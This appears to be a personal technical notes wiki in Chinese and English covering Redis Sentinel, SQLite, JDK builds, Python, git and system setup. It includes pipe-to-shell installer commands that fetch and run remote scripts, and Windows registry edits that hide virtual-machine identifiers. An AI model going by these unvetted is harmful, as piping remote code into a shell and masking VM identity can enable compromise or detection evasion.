down-after-milliseconds
sentinel会向master发送心跳PING来确认master是否存活,如果master在“一定时间范围”内不回应PONG 或者是回复了一个错误消息,那么这个sentinel会主观地(单方面地)认为这个master已经不可用了
parallel-syncs
在发生failover主备切换时,这个选项指定了最多可以有多少个slave同时对新的master进行同步,这个数字越小,完成failover所需的时间就越长,但是如果这个数字越大,就意味着越多的slave因为replication而不可用。可以通过将这个值设为 1 来保证每次只有一个slave处于不能处理命令请求的状态。
sentinel对于不可用有两种不同的看法,一个叫主观不可用(SDOWN),另外一个叫客观不可用(ODOWN)。SDOWN是sentinel自己主观上检测到的关于master的状态,ODOWN需要一定数量的sentinel达成一致意见才能认为一个master客观上已经宕掉,各个sentinel之间通过命令SENTINEL is_master_down_by_addr来获得其它sentinel对master的检测结果。
min-slaves-to-write 1 min-slaves-max-lag 10
当一个redis是master时,如果它不能向至少一个slave写数据(上面的min-slaves-to-write指定了slave的数量),它将会拒绝接受客户端的写请求。由于复制是异步的,master无法向slave写数据意味着slave要么断开连接了,要么不在指定时间内向master发送同步数据的请求了(上面的min-slaves-max-lag指定了这个时间)
向sentinel订阅消息
psubscribe *
psubscribe sdown
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>
所有收到的消息的消息格式
+reset-master <instance details> -- 当master被重置时.
+slave <instance details> -- 当检测到一个slave并添加进slave列表时.
+failover-state-reconf-slaves <instance details> -- Failover状态变为reconf-slaves状态时
+failover-detected <instance details> -- 当failover发生时
+slave-reconf-sent <instance details> -- sentinel发送SLAVEOF命令把它重新配置时
+slave-reconf-inprog <instance details> -- slave被重新配置为另外一个master的slave,但数据复制还未发生时。
+slave-reconf-done <instance details> -- slave被重新配置为另外一个master的slave并且数据复制已经与master同步时。
-dup-sentinel <instance details> -- 删除指定master上的冗余sentinel时 (当一个sentinel重新启动时,可能会发生这个事件).
+sentinel <instance details> -- 当master增加了一个sentinel时。
+sdown <instance details> -- 进入SDOWN状态时;
-sdown <instance details> -- 离开SDOWN状态时。
+odown <instance details> -- 进入ODOWN状态时。
-odown <instance details> -- 离开ODOWN状态时。
+new-epoch <instance details> -- 当前配置版本被更新时。
+try-failover <instance details> -- 达到failover条件,正等待其他sentinel的选举。
+elected-leader <instance details> -- 被选举为去执行failover的时候。
+failover-state-select-slave <instance details> -- 开始要选择一个slave当选新master时。
no-good-slave <instance details> -- 没有合适的slave来担当新master
selected-slave <instance details> -- 找到了一个适合的slave来担当新master
failover-state-send-slaveof-noone <instance details> -- 当把选择为新master的slave的身份进行切换的时候。
failover-end-for-timeout <instance details> -- failover由于超时而失败时。
failover-end <instance details> -- failover成功完成时。
switch-master <master name> <oldip> <oldport> <newip> <newport> -- 当master的地址发生变化时。通常这是客户端最感兴趣的消息了。
+tilt -- 进入Tilt模式。
-tilt -- 退出Tilt模式。
3.5.6 - Redis Type
redisObject
Redis 类型系统的核心,数据库中的每个键、值,以及Redis 本身处理的参数,都表示为这种数据类型
// server.h
/* The actual Redis Object */
#define OBJ_STRING 0 /* String object. */
#define OBJ_LIST 1 /* List object. */
#define OBJ_SET 2 /* Set object. */
#define OBJ_ZSET 3 /* Sorted set object. */
#define OBJ_HASH 4 /* Hash object. */
/* Objects encoding. Some kind of objects like Strings and Hashes can be
* internally represented in multiple ways. The 'encoding' field of the object
* is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0 /* Raw representation */ // 编码为字符串
#define OBJ_ENCODING_INT 1 /* Encoded as integer */ // 编码为整数
#define OBJ_ENCODING_HT 2 /* Encoded as hash table */ // 编码为哈希表
#define OBJ_ENCODING_ZIPMAP 3 /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */ // 编码为压缩列表
#define OBJ_ENCODING_INTSET 6 /* Encoded as intset */ // 编码为整数集合
#define OBJ_ENCODING_SKIPLIST 7 /* Encoded as skiplist */ // 编码为跳跃表
#define OBJ_ENCODING_EMBSTR 8 /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */
typedef struct redisObject {
// 数据类型,OBJ_STRING等
unsigned type:4;
// 编码方式,OBJ_ENCODING_RAW等
unsigned encoding:4;
// #define LRU_BITS 24
// LRU 时间
unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
* LFU data (least significant 8 bits frequency
* and most significant 16 bits access time). */
// 引用计数
int refcount;
// 指向对象的值
void *ptr;
} robj;
类型自省
type keyname
type REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET or REDIS_ZSET,
object encoding keyname
encoding int, embstr or raw for REDIS_STRING,
object idletime keyname (unit is second)
lru access time
object refcount keyname
only for number-format string, shared object ref count
String
Simple Dynamic String
struct sdshdr {
int len;
int free;
char buf[];
};
REDIS_STRING
int, 8 bytes long
embstr <=39 bytes readonly string
raw > 39 bytes
3.6 - Sqlite
cmd
.help
.databases
.tables
Sample
-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;
create table student (
name varchar(100) not null primary key,
class varchar(100),
gender varchar(100),
age smallint default -1,
height decimal(16,6),
weight decimal(16,6)
);
insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);
date,subject,sdutent_name,score
create table score (
`date` date not null,
subject varchar(100),
student_name varchar(100),
score decimal(16,6)
);
insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);
4 - Lang
4.1 - JVM
4.1.1 - Maven
test
# org.apache.maven.plugins:maven-surefire-plugin:2.22.0
mvn -Dtest=TestApp1,TestApp2 test
mvn -Dtest=TestApp1#testHello* test
# match pattern 'testHello*' and 'testMagic*'
mvn -Dtest=TestApp1#testHello*+testMagic* test
4.1.2 - OpenJDK
compile openjdk
jdk18 on mac
git clone https://github.com/openjdk/jdk18.git --depth=1
# autoconf=2.71, ccache=4.6.3, freetype=2.12.1
brew install autoconf ccache freetype
bash ./configure --help
# --enable-debug : --with-debug-level=fastdebug --with-debug-level=slowdebug
# --with-jvm-variants=server
# --with-num-cores=8
# --with-memory-size=8192
# MacOS
# configure: error: No xcodebuild tool and no system framework headers found
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
# jdk17+ require xcode itself
bash ./configure --with-debug-level=slowdebug --enable-ccache --disable-warnings-as-errors
make images
./build/macosx-x86_64-normal-server-slowdebug/jdk/bin/java -version
jdk8u
# jdk8u
bash ./configure --with-num-cores=8 --with-debug-level=slowdebug
jdk17 on debian10
# 10.3 is ok
sudo apt install g++-10
# Compile jdk17 on debian 11.2 gcc 10.2
git clone https://github.com/openjdk/jdk17 --depth=1
cd jdk17u
# tools
sudo apt install gcc g++ make autoconf ccache zip
# Boot JDK
sudo apt install openjdk-17-jdk
# header files
sudo apt install -y libx11-dev libxext-dev libxrender-dev libxrandr-dev libxtst-dev libxt-dev
sudo apt install -y libcups2-dev libfontconfig1-dev libasound2-dev
bash ./configure --with-debug-level=slowdebug --enable-ccache
make images
4.1.3 - Scala
Scala语法
// import math._ but cos
import math.{cos => _, _}
object HelloWolrd {
def main(args: Array[String]): Unit = {
val myVal: String = "Hello World!"
var myVar: Long = System.currentTimeMillis()
myVar += 1
val name = myVal:Object // cast
println(s"$myVal")
}
def patternMatch(x: Any): Any = x match {
case 1 => 1
case "five" => 5
case _ => 0
}
}
trait Animal {
final val age = 18
val color: String
val kind = "Animal"
def eq(x: Any): Boolean
def ne(x: Any): Boolean = !eq(x)
}
class Cat extends Animal {
override val color = "Yellow"
override val kind = "Cat"
def eq(x: Any): Boolean = false
}
class Dog(name: String) extends Animal {
def this() = this("Dog")
override val color = "Brown"
def eq(x: Any): Boolean = true
}
trait Traversable {
def foreach[U](f: Elem => U): Unit
}
trait Iterable extends Traversable
trait Seq extends Iterable
trait Set extends Iterable
trait Map extends Iterable
import cpllection.JavaConvertions._
4.2 - Python
4.2.1 - Async Python
gunicorn
< A Python WSGI HTTP server, run on Unix-like OS, inspired by ruby unicorn < pre-fork-worker模式,一个master进程管理多个worker进程 < 推荐的worker数量是:(2 * $num_cores) + 1
pip install gunicorn greenlet eventlet gevent
# -k, --worker-class 工作模式
gunicorn -k sync --workers=17 --threads 1 --worker-connections 1000
sync 多进程模式
一次仅处理一个请求
eventlet, gevent 协程模式
协程实现(cooperative multi-threading),利用非同步IO让一个process在等待IO回应时继续处理下个请求
gthread 多线程模式
线程工作模式,利用线程池管理连接
gaiohttp
利用aiohttp库实现异步I/O
4.2.2 - Database client in Python
mysql
# pip3 install PyMySQL
import pymysql
db = pymysql.connect("localhost","user","passwd","testdb" )
cursor = db.cursor()
cursor.execute("SELECT VERSION()")
print(f"Database version : {cursor.fetchone()}")
try:
cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
db.commit()
except:
db.rollback()
cursor.execute("SELECT 1")
rows = cursor.fetchall()
for row in rows:
print(row[0])
db.close()
rabbitmq
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters('127.0.0.1', 5672))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='Hello World!')
print("[x] Sent 'Hello World!'")
connection.close()
4.2.3 - Install Python
pyenv
curl https://pyenv.run | bash
pyenv install --list
pyenv versions
pyenv global 3.7.15
install python2.7
sudo apt install make gcc g++ patch cmake -y
sudo apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
pyenv install 2.7.18
build from source
wget http://www.python.org/ftp/python/3.7.15/Python-3.7.15.tgz
tar -zxvf Python-3.7.15.tgz
cd Python-3.7.15
./configure --prefix=/opt/python3 --enable-optimizations
make
make install
make clean
make distclean
/opt/python3/bin/python3 -V
python2
debian9
# docker pull debian:9
# docker run -d -it --name debian9 debian:9
# https://mirrors.tuna.tsinghua.edu.cn/help/debian/
apt update
apt install python python-pip -y
pip install -U setuptools
apt install make gcc g++ patch cmake -y
apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
# mysql-python
# for old debian: libmysqlclient-dev
apt install default-libmysqlclient-dev -y
pip install mysql-python
# pyarrow
apt install -y -V ca-certificates lsb-release wget
wget https://apache.jfrog.io/artifactory/arrow/$(lsb_release --id --short | tr 'A-Z' 'a-z')/apache-arrow-apt-source-latest-$(lsb_release --codename --short).deb -O /tmp/apache-arrow.deb
apt -y install /tmp/apache-arrow.deb
apt -y update
apt -y install libarrow-dev libarrow-python-dev
rm /tmp/apache-arrow.deb
fedora
# docker pull fedora
# docker run -d -it --name fedora fedora
# https://mirrors.tuna.tsinghua.edu.cn/help/fedora/
# python2 is not included
# dnf whatprovides pip
# sudo alternatives --set python /usr/bin/python2
dnf update && dnf install git curl -y
curl https://pyenv.run | bash
cat <<EOF >> ~/.bashrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
source ~/.bashrc
dnf install make gcc g++ -y
dnf install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel -y
pyenv install 2.7.18
pyenv global 2.7.18
# pyarrow
dnf install cmake libarrow-devel libarrow-python-devel -y
pip install arrow pyarrow
# mysql-python
dnf install mysql-devel -y
pip install mysql-python
4.2.4 - IPython
ipython
ipython --pylab
4.2.5 - Python Pip
Install pip
wget https://bootstrap.pypa.io/get-pip.py -O - | python
Install packages for Mac ARM
numpy
brew install openblas
OPENBLAS="$(brew --prefix openblas)" pip install numpy
4.2.6 - Python Std
base
datetime & time
import datetime
import time
dt = datetime.datetime.now()
unix_sec = time.mktime(dt.timetuple())
dt = datetime.datetime.fromtimestamp(time.time())
s = dt.strftime("%Y-%m-%d %H:%M:%S")
dt = datetime.datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
unix_sec = time.mktime(time.strptime(s, "%Y-%m-%d %H:%M:%S"))
s = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(unix_sec))
random
import random
n_float = random.uniform(0, 10) # [0, 10)
n_float = random.random() # [0, 1.0)
# random.randrange([start], stop[, step])
n_int = random.randint(1, 3) # [1, 3]
s_str = random.choice(['r', 'g', 'b'])
s_list = random.sample(['r', 'g', 'b'], 2)
file
ConfigParser
import ConfigParser
conf = ConfigParser.ConfigParser()
conf.read("myapp.ini")
sections = conf.sections()
section = sections [0]
keys = conf.options("sec")
kvs = conf.items("sec")
val = conf.get("sec", "key")
int_val = conf.getint("sec", "key")
4.2.7 - Python Test
unittest
import unittest
class TestStringMethods(unittest.TestCase):
def test_somecase(self):
self.assertEqual('foo'.upper(), 'FOO')
self.assertTrue('FOO'.isupper())
self.assertFalse('Foo'.isupper())
if __name__ == '__main__':
unittest.main()
python -m unittest test_module1 test_module2
python -m unittest test_module.TestClass
python -m unittest test_module.TestClass.test_method
python -m unittest -v tests/test_something.py
4.2.8 - Python Web
std
python3 -m http.server 3333
python -m SimpleHTTPServer 3333
fastapi
Python 3.7+
http://127.0.0.1:8000/docs for https://github.com/swagger-api/swagger-ui http://127.0.0.1:8000/redoc for https://github.com/Rebilly/ReDoc
pip install "fastapi[all]"
# use the 'app' object in module fastapi-main(or file called fastapi-main.py)
uvicorn fastapi-main:app --reload
from fastapi import FastAPI
app = FastAPI()
@app.get("/")
async def root(secs: float):
from time import sleep
sleep(secs)
return {"message": "Hello World"}
flask
pip install Flask
python -m flask run
from flask import Flask, request
app = Flask(__name__)
@app.route("/")
def hello_world():
secs = request.args.get("secs")
from time import sleep
sleep(float(secs))
return {"message": "Hello World"}
if __name__ == '__main__':
app.run(debug=True)
django
pip install Django
django-admin startproject mysite
cd mysite
python manage.py runserver 0.0.0.0:8000
bottle
from bottle import request, route, run, template
from time import sleep
@route('/hello/<name>')
def hello(name):
return template('<b>Hello {{name}}</b>!', name=name)
@route('/')
def index():
secs = request.query.get('secs')
name = request.query.get('name')
if secs:
sleep(float(secs))
if not name:
name = "World
return "Hello {}!".format(name)
run(host='0.0.0.0', port=8000)
trollius
import trollius as asyncio
from trollius import From
@asyncio.coroutine
def factorial(name, number):
f = 1
for i in range(2, number + 1):
print("Task %s: Compute factorial(%d)..." % (name, i))
yield From(asyncio.sleep(1))
f *= i
print("Task %s completed! factorial(%d) is %d" % (name, number, f))
loop = asyncio.get_event_loop()
tasks = [
asyncio.async(factorial("A", 8)),
asyncio.async(factorial("B", 3)),
asyncio.async(factorial("C", 4))]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
4.3 - Shell
4.3.1 - Frequently used cmds
stat
tree -if | grep -v node_modules | egrep '[.](j|t)sx?$' | xargs wc -l
4.3.2 - Gnu Tools
datetime
date
# 9999-99-99 99:99:99
# 00-23 00-23 00-59
# %t tab char
# %I 00-12
# %j 000-366
# %D MM/dd/yy
# %T hh:mm:ss
date "+%Y-%m-%d %H:%M:%S"
# timestamp, in sec
date +%s
cal
# print cal
cal
cal 9 1752
5 - Ops
5.1 - Os
5.1.1 - CoreOS
rpm-ostree
# omz chsh
sudo rpm-ostree install git wget zsh vim util-linux-user
# compile
sudo rpm-ostree install make gcc g++ patch
# pkg
sudo rpm-ostree install dnf
sudo systemctl reboot
python
curl https://pyenv.run | bash
# add to ~/.zshrc
cat <<EOF >> ~/.zshrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
# dep lib to compile
sudo rpm-ostree install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel
pyenv versions
pyenv install 2.7.18
pyenv install 3.9.13
pyenv global 2.7.18
# pyarrow
sudo rpm-ostree install libarrow-devel libarrow-python-devel
5.1.2 - libvirt
install
- mac
brew install qemu gcc libvirt
brew install virt-manager
# macOS doesn't support QEMU security features
echo 'security_driver = "none"' >> /opt/homebrew/etc/libvirt/qemu.conf
echo "dynamic_ownership = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
echo "remember_owner = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
brew services start libvirt
vagrant
# https://developer.fedoraproject.org/tools/vagrant/vagrant-libvirt.html
# https://vagrant-libvirt.github.io/vagrant-libvirt/installation.html
# vagrant plugin install vagrant-libvirt
Vagrant.configure("2") do |config|
config.vm.provider :libvirt do |libvirt|
libvirt.driver = "qemu"
end
end
# export VAGRANT_DEFAULT_PROVIDER=libvirt
# vagrant up --provider=libvirt
create
from iso
mkdir ~/vms && cd ~/vms
qemu-img create -f qcow2 debian.qcow2 50g
virsh define debian.xml
virsh start debian
virsh list
from qcow2/raw
# https://cdimage.debian.org/images/cloud/stretch/daily/
# yum install qemu-kvm qemu-kvm-tools virt-manager libvirt virt-install –y
virt-install --name debian --ram 2048 --vcpus=2 --disk path=debian.qcow2 --network=bridge:en0 --force --import --autostart
virsh console --domain debian --force
# KVM format convert
qemu-img convert -p -t directsync -O qcow2 test.raw test.qcow2
qemu-img convert -p -t directsync -O raw test.qcows test.raw
5.1.3 - Oh My Zsh
zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
cp ~/.oh-my-zsh/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/
mv ~/.oh-my-zsh/custom/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# vim ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# replace blue to cyan
# vim ~/.zshrc
# ZSH_THEME="myagnoster"
# add zsh-autosuggestions zsh-syntax-highlighting
cd ~/.oh-my-zsh/custom/plugins
git clone https://github.com/zsh-users/zsh-autosuggestions --depth 1
git clone https://github.com/zsh-users/zsh-syntax-highlighting --depth 1
# . ~/.zshrc
vim
Vim-Plug
# PlugInstall [pluginName]
# PlugUpdate [pluginName]
# PlugDiff : show changelog
# PlugUpgrade : upgrade itself
# PlugStatus
# PlugClean
# PlugSnapshot [filePath] : save a snapshot
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
" ~/.vim/bundle for Vundle(https://github.com/VundleVim/Vundle.vim
) compatibility
" Plug 'userName/repoName' or Plug 'pluginName' for https://github.com/vim-scripts
" Vim-Plug download Plugin like this: git -C ~/.vim/bundle clone --recursive https://github.com/vim-scripts/L9.git
call plug#begin('~/.vim/bundle')
" Plug 'file:///path/to/plugin'
" Plug "git:https://exmaple.com/user/repo.git"
" dir tree
Plug 'preservim/nerdtree'
" start screen
Plug 'mhinz/vim-startify'
" highlighting and navigating through different words in a buffer
Plug 'lfv89/vim-interestingwords'
" Check syntax
Plug 'dense-analysis/ale'
" lean & mean status/tabline for vim that's light as air
Plug 'vim-airline/vim-airline'
call plug#end()
5.1.5 - Windows
虚拟机
去掉虚拟机标识
:echo rename PRLS__ to NOBOX_
REG COPY HKLM\HARDWARE\ACPI\DSDT\PRLS__ HKLM\HARDWARE\ACPI\DSDT\NOBOX_ /s
REG DELETE HKLM\HARDWARE\ACPI\DSDT\PRLS__ /f
:modify SystemBiosVersion
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion /t REG_MULTI_SZ /d "NOBOX - 1\018.0.2 (53077)\0Some EFI x64 18.0.2-53077 - 12CF55\0" /f
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v VideoBiosVersion /t REG_MULTI_SZ /d "" /f
pause
5.2 - VCS
5.2.1 - Git
git
# mkdir blog && cd blog
# git init
# git remote add origin git@github.com:tukeof/tukeof.github.io.git
git clone git://github.com/tukeof/tukeof.github.io.git blog
cd blog
git add *.md
git commit -m 'initial project version'
git push -u origin master
remote
# 添加一个新的远程Git存储库
git remote add <shortname> <url>
git remote add origin git@github.com:tukeof/tukeof.github.io.git
git remote add origin ssh://username@127.0.0.1/reponame
git remote -v
git remote update
# 也会改变所有远程跟踪分支名称
git remote rename branch1 branch2
git remote rm branch1
git remote show origin
# 在本地新建一个tmp分支,并将远程origin仓库的master分支代码下载到本地tmp分支
git fetch origin master:tmp
# 比较本地代码与刚刚从远程下载下来的代码的区别
git diff tmp
# 合并temp分支到本地的master分支
git merge tmp
# 删除tmp分支
git branch -d tmp
# 取回远程主机某个分支的更新,再与本地的指定分支合并
git pull origin master:<branch_name>
add, rm, commit, log
# -a,--all,自动暂存已修改和删除的文件
git commit -a -m 'message'
# 从工作目录和暂存区域中删除文件
git rm <file>
# 仅从暂存区域中删除目录
git rm -r -cached <dir>
git mv README.md README
# mv README.md README
# git rm README.md
# git add README
# --amend
# 占用当前暂存区域并将其用于提交。如果自上次提交后没有进行任何更改,那么快照将看起来完全相同,并且将更改的是提交消息。
git commit --amend
# 撤销对暂存区的更改
git reset HEAD <file>
# 丢弃工作目录中的更改
git checkout - <file>
svn
# clone
svn co https://localhost/user/repo
svn co https://localhost/username/repo -r some_version
svn checkout https://localhost/username/repo/dir1/dir2/proj1
arc
# Phabricator
git clone https://github.com/phacility/libphutil.git
git clone https://github.com/phacility/arcanist.git
# 将 some_install_path/arcanist/bin 加入到$PATH变量中
# 权限认证
arc install-certificate
arc set-config editor "vim"
# 开分支(git branch),或查看当前分支和关联的 revision
arc feature
# 创建或更新 revision,范围是 origin/master 到最新提交,包括暂存区的内容
arc diff
# 所有 revision 和状态
arc list
# 当前分支上的 commit 会全部被 land, 会先 pull --rebase 再 push
arc land
# 查看 diff 的范围等信息
arc which
Phabricator
// apply patch to current branch
arc patch --diff <patch_version_number> --nocommit --nobranch
5.2.2 - Git Checkout
branch
# list all branch, include local and remote
git branch -a
# delete branch
git branch -d <local_branch>
git push origin --delete <remote_branch>
# list tags
git log --pretty=oneline --abbrev-commit
git show <tag_name>
# tag a tag based on a commit, default cid is `HEAD`
git tag <tag_name> <commit_id>
git tag -a <tag_name> -m "message for tag" <commit_id>
# dangerous operation, it's better no-modification until checkout to `HEAD`
git checkout <tag_name>
#
git checkout -b <bra_name> <tag_name>
git tag -l "<prefix>*"
git push origin <tag_name>
# push all tags
git push origin --tags
# delete a local tag
git tag -d <tag_name>
# delete a remote tag
git push origin :refs/tags/<tag_name>
stash
# list the stash entries that you currently have. stash@{0} is the latest entry
git stash list
# save all uncommitted changes
git stash
# apply all uncommitted changes
git stash apply
merge-base
git merge-base origin/master HEAD
rebase
# Assume the following history exists and the current branch is "topic":
# A - B - C topic
# /
# D - E - F -G master
git switch topic
git rebase master
git rebase master topic
# would be
# A'--B'--C' topic
# /
# D---E---F---G master
graph LR
E --> A --> B --> C(C topic)
D --> E --> F --> G(G master)
mkdir git-repo && cd git-repo
git init --bare
export remote_url=$(pwd)
cd ..
git clone $remote_url git
cd git
# D
echo $(uuidgen) > D && git add . && git commit -m 'D' && git push -u origin master
# D - E
echo $(uuidgen) > E && git add . && git commit -m 'E' && git push -u origin master
git checkout -b topic
git switch master
# D - E - F
echo $(uuidgen) > F && git add . && git commit -m 'F' && git push -u origin master
# D - E - F - G
echo $(uuidgen) > G && git add . && git commit -m 'G' && git push -u origin master
git switch topic
# A
# /
# D - E - F
echo $(uuidgen) > A && git add . && git commit -m 'A' && git push -u origin topic
# A - B
# /
# D - E - F
echo $(uuidgen) > B && git add . && git commit -m 'B' && git push -u origin topic
# A - B - C topic
# /
# D - E - F master
echo $(uuidgen) > C && git add . && git commit -m 'C' && git push -u origin topic
revert
# revert to previous commit
git revert <previous-commit>
reset
# discard changes and reset files to master
git reset --hard origin/master
git reset --hard HEAD
# or save changes
git reset --soft HEAD
# discard changes and reset to current branch
git checkout . && git clean -xdf
5.2.3 - Git Config
config
git help config
man git-config
git config --list
# 提交时转换为LF,检出时转换为CRLF
git config --global core.autocrlf true
# 提交时转换为LF,检出时不转换
git config --global core.autocrlf input
# 提交检出均不转换
git config --global core.autocrlf false
# 拒绝提交包含混合换行符的文件
git config --global core.safecrlf true
# 允许提交包含混合换行符的文件
git config --global core.safecrlf false
# 提交包含混合换行符的文件时给出警告
git config --global core.safecrlf warn
git config --global alias.co checkout
git config --global alias.br branch
git config --global alias.ci commit
git config --global alias.s status
git config --global alias.unstage 'reset HEAD - '
git config --global alias.last 'log -1 HEAD'
# git config --global alias.l '!ls -lah'
git config --global alias.url 'remote get-url --all origin'
# git config --global core.editor "'C:/Options/Notepad++/notepad++.exe' -multiInst -nosession"
git config --global core.editor vim
.gitconfig
[user]
name = yourname
email = youremail
[http]
#proxy = socks5://127.0.0.1:1080
[https]
#proxy = socks5://127.0.0.1:1080
[core]
autocrlf = input
safecrlf = true
[alias]
co = checkout
br = branch
ci = commit
s = statcus
last = log -1 HEAD
lg = log --graph
url = remote get-url --all origin
.ssh/config
ssh-keygen -t rsa -b 4096 -C "youremail"
host *
AddKeysToAgent yes
UseKeychain yes
TCPKeepAlive yes
ServerAliveInterval 60
ServerAliveCountMax 5
host github.com
user git
hostname github.com
port 22
identityfile ~/.ssh/id_rsa
5.2.4 - Git Hook
pre-commit
# https://pre-commit.com/#usage
pip install pre-commit pre-commit-hooks
# write to .git/hooks/pre-commit
pre-commit install
exclude: >
(?x)(
^a/|
^b/c/|
^d/e/__init__.py
)
default_language_version:
python: python3
repos:
- repo: https://github.com/PyCQA/isort
rev: 5.9.3 # tag
hooks:
- id: isort # sort imports
- repo: https://github.com/psf/black
rev: stable
hooks:
- id: black # code formatter
- repo: https://github.com/pycqa/flake8
rev: 4.0.1
hooks:
- id: flake8 # check the style and quality
language_version: python2.7
stages: [manual]
pre-push
5.2.5 - Git How-To
undo untracked
git reset --hard <commit_id>
# show which will be removed, include untracked directories
# -n --dry-run, Don't actually remove anything
git clean -d -n
# delete anyway, no confirm
git clean -d -f
undo not staged change
(removal or modification)
# in stage space but changed by external
# touch a && gti add a && rm a, then a has not staged changes
# discard changes in working directory
git restore <files>
# or
git checkout <files>
# update what will be committed
git add <files>
# caused by removal
git rm <files>
# or
git rm --cached <files>
undo add
# undo stage
git restore --staged <files>
# remove from staged space
git rm --cached d
undo commit
# message
git commit --amend -m 'message which will cover the old one'
# undo commit, but not undo add
# --soft, do not touch the index file nor the working tree
# --hard, match the working tree and index to the given tree
# --mixed, reset the index but not the working tree (default)
git reset --soft HEAD^
# undo <n> commits
git reset --soft HEAD~n
merge commit
# reapply n commits
git rebase -i HEAD~n
# pick
# squash
# ...
# squash
git add .
git rebase --continue
# git rebase --abort
git push --force
delete the last commit
# where git interprets x^ as the parent of x
# + as a forced non-fastforward push.
git push master +<second-last-commit>^:master
# or
git reset HEAD^ --hard
git push master -f
delete the second last commit
# this will open an editor and show a list of all commits since the commit we want to get rid of
# simply remove the line with the offending commit, likely that will be the first line
git rebase -i <second-last-commit>^
git push master -f
5.2.6 - Git Log
status
git init --bare /path/to/repo/.git
# git remote add origin /path/to/repo/.git
git clone /path/to/repo
# 显示工作目录和当前HEAD提交之间存在差异的路径
git status
# --short
# A added.c
# M modified.cc
# R renamed.h
# D deleted.hh
git status -s
diff
# 将工作目录中的内容与暂存区域中的内容进行比较
git diff
# --cached,将暂存更改与上次提交进行比较
git diff --staged
git diff oldCommit..newCommit
log
# 按反向时间顺序列出在该存储库中进行的提交
git log
# -p,patch 显示每次提交中引入的差异(补丁输出)
# -2 仅显示最后两个条目
# --stat 在每个提交条目下方打印一个已修改文件的列表,已更改的文件数以及这些文件中添加和删除的行数
# --shortstat 仅显示--stat命令中已更改/插入/删除行。
# --pretty=oneline 在一行上打印每个提交
git log --pretty=oneline
# 短哈希 - 作者名,日期 :注释
git log --pretty=format:"%h - %an, %ar : %s"
# --graph 添加一个很好的小ASCII图,显示您的分支和合并历史记录
git log --pretty=format:"%h %s" --graph
git log -<n>
# --since, --after
# --until, --before
git log --since=2.weeks
git log --since="2008-01-15"
git log --since="2 years 1 day 3 minutes ago"
# --committer 执行提交的用户
# --author 作出修改的用户
# 在提交消息中搜索关键字
git --author=<author> --grep="keyword"
# 可以指定--author和--grep搜索条件的多个实例
